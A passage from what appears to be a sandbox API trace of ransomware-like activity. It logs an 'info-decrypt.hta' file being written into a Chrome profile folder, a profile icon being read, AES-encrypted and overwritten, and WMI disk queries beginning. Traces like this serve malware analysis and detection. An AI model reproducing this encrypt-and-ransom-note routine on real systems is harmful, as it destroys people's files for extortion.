(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x45c [0192.744] GetFileType (hFile=0x45c) returned 0x1 [0192.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e8) returned 1 [0192.744] GetFileType (hFile=0x45c) returned 0x1 [0192.744] WriteFile (in: hFile=0x45c, lpBuffer=0x35eca10*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949eab0, lpOverlapped=0x0 | out: lpBuffer=0x35eca10*, lpNumberOfBytesWritten=0x949eab0*=0x1000, lpOverlapped=0x0) returned 1 [0192.745] WriteFile (in: hFile=0x45c, lpBuffer=0x35eca10*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ea84, lpOverlapped=0x0 | out: lpBuffer=0x35eca10*, lpNumberOfBytesWritten=0x949ea84*=0x55e, lpOverlapped=0x0) returned 1 [0192.745] CloseHandle (hObject=0x45c) returned 1 [0192.746] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", nBufferLength=0x105, lpBuffer=0x949e658, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", lpFilePart=0x0) returned 0x5e [0192.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb04) returned 1 [0192.746] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), fInfoLevelId=0x0, lpFileInformation=0x35eda2c | out: lpFileInformation=0x35eda2c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81c321d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81c321d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81c58330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2b2e9)) returned 1 [0192.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb00) returned 1 [0192.926] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", nBufferLength=0x105, lpBuffer=0x949e544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", lpFilePart=0x0) returned 0x5e [0192.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea38) returned 1 [0192.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0192.926] GetFileType (hFile=0x598) returned 0x1 [0192.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea34) returned 1 [0192.927] GetFileType (hFile=0x598) returned 0x1 [0192.927] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x949eb40 | out: lpFileSizeHigh=0x949eb40*=0x0) returned 0x2b2e9 [0192.927] ReadFile (in: hFile=0x598, lpBuffer=0x712a358, nNumberOfBytesToRead=0x2b2e9, lpNumberOfBytesRead=0x949eaec, lpOverlapped=0x0 | out: lpBuffer=0x712a358*, lpNumberOfBytesRead=0x949eaec*=0x2b2e9, lpOverlapped=0x0) returned 1 [0192.973] CloseHandle (hObject=0x598) returned 1 [0192.973] CryptAcquireContextW (in: phProv=0x949ea8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea8c*=0x66ba6b8) returned 1 [0192.974] CryptGenRandom (in: hProv=0x66ba6b8, dwLen=0x10, pbBuffer=0x35ee374 | out: pbBuffer=0x35ee374) returned 1 [0193.586] CryptImportKey (in: hProv=0x66ba6b8, pbData=0x377d1c8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea5c | out: phKey=0x949ea5c*=0xb7f890) returned 1 [0193.586] CryptContextAddRef (hProv=0x66ba6b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0193.586] CryptContextAddRef (hProv=0x66ba6b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0193.586] CryptDuplicateKey (in: hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x949ea4c | out: phKey=0x949ea4c*=0xb7f610) returned 1 [0193.586] CryptContextAddRef (hProv=0x66ba6b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0193.586] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x4, pbData=0x377d2a8*=0x1, dwFlags=0x0) returned 1 [0193.586] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x1, pbData=0x377d274, dwFlags=0x0) returned 1 [0193.587] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x7155660*, pdwDataLen=0x949eab8*=0x2b2f0, dwBufLen=0x2b2f0 | out: pbData=0x7155660*, pdwDataLen=0x949eab8*=0x2b2f0) returned 1 [0193.590] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x377d2d0*, pdwDataLen=0x949eac0*=0x0, dwBufLen=0x10 | out: pbData=0x377d2d0*, pdwDataLen=0x949eac0*=0x10) returned 1 [0193.592] CryptDestroyKey (hKey=0xb7f890) returned 1 [0193.592] CryptReleaseContext (hProv=0x66ba6b8, dwFlags=0x0) returned 1 [0193.592] CryptReleaseContext (hProv=0x66ba6b8, dwFlags=0x0) returned 1 [0193.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", nBufferLength=0x105, lpBuffer=0x949e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", lpFilePart=0x0) returned 0x5e [0193.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea24) returned 1 [0193.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0193.595] GetFileType (hFile=0x45c) returned 0x1 [0193.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea20) returned 1 [0193.595] GetFileType (hFile=0x45c) returned 0x1 [0193.595] WriteFile (in: hFile=0x45c, lpBuffer=0x377d934*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949eab4, lpOverlapped=0x0 | out: lpBuffer=0x377d934*, lpNumberOfBytesWritten=0x949eab4*=0x20, lpOverlapped=0x0) returned 1 [0193.595] CloseHandle (hObject=0x45c) returned 1 [0193.596] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0193.596] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0193.596] CoTaskMemFree (pv=0xbed438) [0193.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0193.596] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea60 | out: ppv=0x949ea60*=0xb51e34) returned 0x0 [0193.596] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea58 | out: pAptType=0x949ea58*=1) returned 0x0 [0193.596] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea5c | out: ppvObject=0x949ea5c*=0x0) returned 0x80004002 [0193.596] IUnknown:Release (This=0xb51e34) returned 0x1 [0193.598] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e3c8 | out: ppv=0x949e3c8*=0x6027780) returned 0x0 [0193.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027780, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e5e0 | out: ppvObject=0x949e5e0*=0x0) returned 0x80004002 [0193.848] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027780, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5f4 | out: ppvObject=0x949e5f4*=0x6030b70) returned 0x0 [0193.848] WbemDefPath:IUnknown:Release (This=0x6027780) returned 0x0 [0193.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e214 | out: ppvObject=0x949e214*=0x6030b70) returned 0x0 [0193.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e1d0 | out: ppvObject=0x949e1d0*=0x0) returned 0x80004002 [0193.848] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0193.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949db2c | out: ppvObject=0x949db2c*=0x0) returned 0x80004002 [0193.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0193.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dae8 | out: ppvObject=0x949dae8*=0xbdf050) returned 0x0 [0193.848] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf050, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daf0 | out: pCid=0x949daf0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.848] WbemDefPath:IUnknown:Release (This=0xbdf050) returned 0x3 [0193.848] CoGetContextToken (in: pToken=0x949db48 | out: pToken=0x949db48) returned 0x0 [0193.849] CoGetContextToken (in: pToken=0x949df50 | out: pToken=0x949df50) returned 0x0 [0193.849] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfe0 | out: ppvObject=0x949dfe0*=0x0) returned 0x80004002 [0193.849] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0193.849] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x1 [0193.849] CoGetContextToken (in: pToken=0x949e8d8 | out: pToken=0x949e8d8) returned 0x0 [0193.849] CoGetContextToken (in: pToken=0x949e838 | out: pToken=0x949e838) returned 0x0 [0193.849] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x949e908*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e904 | out: ppvObject=0x949e904*=0x6030b70) returned 0x0 [0193.849] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0193.849] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0193.849] WbemDefPath:IWbemPath:SetText (This=0x6030b70, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x949ea8c | out: puCount=0x949ea8c*=0x0) returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949ea88*=0x0, pszText=0x0 | out: puBuffLength=0x949ea88*=0x20, pszText=0x0) returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x949ea88*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea88*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x949ea94 | out: puResponse=0x949ea94*=0xc19) returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x949ea8c | out: puCount=0x949ea8c*=0x0) returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x949ea94 | out: puResponse=0x949ea94*=0xc19) returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x949ea94 | out: puResponse=0x949ea94*=0xc19) returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x949ea0c | out: puCount=0x949ea0c*=0x0) returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9f8 | out: puCount=0x949e9f8*=0x2) returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9f4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9f4*=0xf, pszText=0x0) returned 0x0 [0193.849] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.849] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e9a8 | out: ppv=0x949e9a8*=0xb51e34) returned 0x0 [0193.850] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e9a0 | out: pAptType=0x949e9a0*=1) returned 0x0 [0193.850] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e9a4 | out: ppvObject=0x949e9a4*=0x0) returned 0x80004002 [0193.850] IUnknown:Release (This=0xb51e34) returned 0x1 [0193.851] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e310 | out: ppv=0x949e310*=0x60277c0) returned 0x0 [0193.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x60277c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e528 | out: ppvObject=0x949e528*=0x0) returned 0x80004002 [0193.851] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60277c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e53c | out: ppvObject=0x949e53c*=0x60308d0) returned 0x0 [0193.851] WbemDefPath:IUnknown:Release (This=0x60277c0) returned 0x0 [0193.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e15c | out: ppvObject=0x949e15c*=0x60308d0) returned 0x0 [0193.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e118 | out: ppvObject=0x949e118*=0x0) returned 0x80004002 [0193.851] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0193.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da74 | out: ppvObject=0x949da74*=0x0) returned 0x80004002 [0193.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0193.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da30 | out: ppvObject=0x949da30*=0xbdf180) returned 0x0 [0193.851] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf180, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949da38 | out: pCid=0x949da38*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.851] WbemDefPath:IUnknown:Release (This=0xbdf180) returned 0x3 [0193.851] CoGetContextToken (in: pToken=0x949da90 | out: pToken=0x949da90) returned 0x0 [0193.852] CoGetContextToken (in: pToken=0x949de98 | out: pToken=0x949de98) returned 0x0 [0193.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df28 | out: ppvObject=0x949df28*=0x0) returned 0x80004002 [0193.852] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0193.852] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0193.852] CoGetContextToken (in: pToken=0x949e820 | out: pToken=0x949e820) returned 0x0 [0193.852] CoGetContextToken (in: pToken=0x949e780 | out: pToken=0x949e780) returned 0x0 [0193.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x949e850*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e84c | out: ppvObject=0x949e84c*=0x60308d0) returned 0x0 [0193.852] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0193.852] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0193.852] WbemDefPath:IWbemPath:SetText (This=0x60308d0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0193.852] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x949e9d0 | out: puCount=0x949e9d0*=0x2) returned 0x0 [0193.852] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x949e9cc*=0x0, pszText=0x0 | out: puBuffLength=0x949e9cc*=0xf, pszText=0x0) returned 0x0 [0193.852] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x949e9cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.852] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e9d0 | out: ppv=0x949e9d0*=0xb51e34) returned 0x0 [0193.852] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e9c8 | out: pAptType=0x949e9c8*=1) returned 0x0 [0193.852] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e9cc | out: ppvObject=0x949e9cc*=0x0) returned 0x80004002 [0193.852] IUnknown:Release (This=0xb51e34) returned 0x1 [0193.853] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5f0 | out: ppv=0x949e5f0*=0x6023c18) returned 0x0 [0193.853] WbemLocator:IUnknown:QueryInterface (in: This=0x6023c18, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e808 | out: ppvObject=0x949e808*=0x0) returned 0x80004002 [0193.853] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023c18, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e81c | out: ppvObject=0x949e81c*=0x60277d0) returned 0x0 [0193.853] WbemLocator:IUnknown:Release (This=0x6023c18) returned 0x0 [0193.853] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e43c | out: ppvObject=0x949e43c*=0x60277d0) returned 0x0 [0193.853] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3f8 | out: ppvObject=0x949e3f8*=0x0) returned 0x80004002 [0193.854] WbemLocator:IUnknown:AddRef (This=0x60277d0) returned 0x3 [0193.854] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd54 | out: ppvObject=0x949dd54*=0x0) returned 0x80004002 [0193.854] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0193.854] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dd10 | out: ppvObject=0x949dd10*=0x0) returned 0x80004002 [0193.854] CoGetContextToken (in: pToken=0x949dd70 | out: pToken=0x949dd70) returned 0x0 [0193.854] CoGetContextToken (in: pToken=0x949e178 | out: pToken=0x949e178) returned 0x0 [0193.854] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 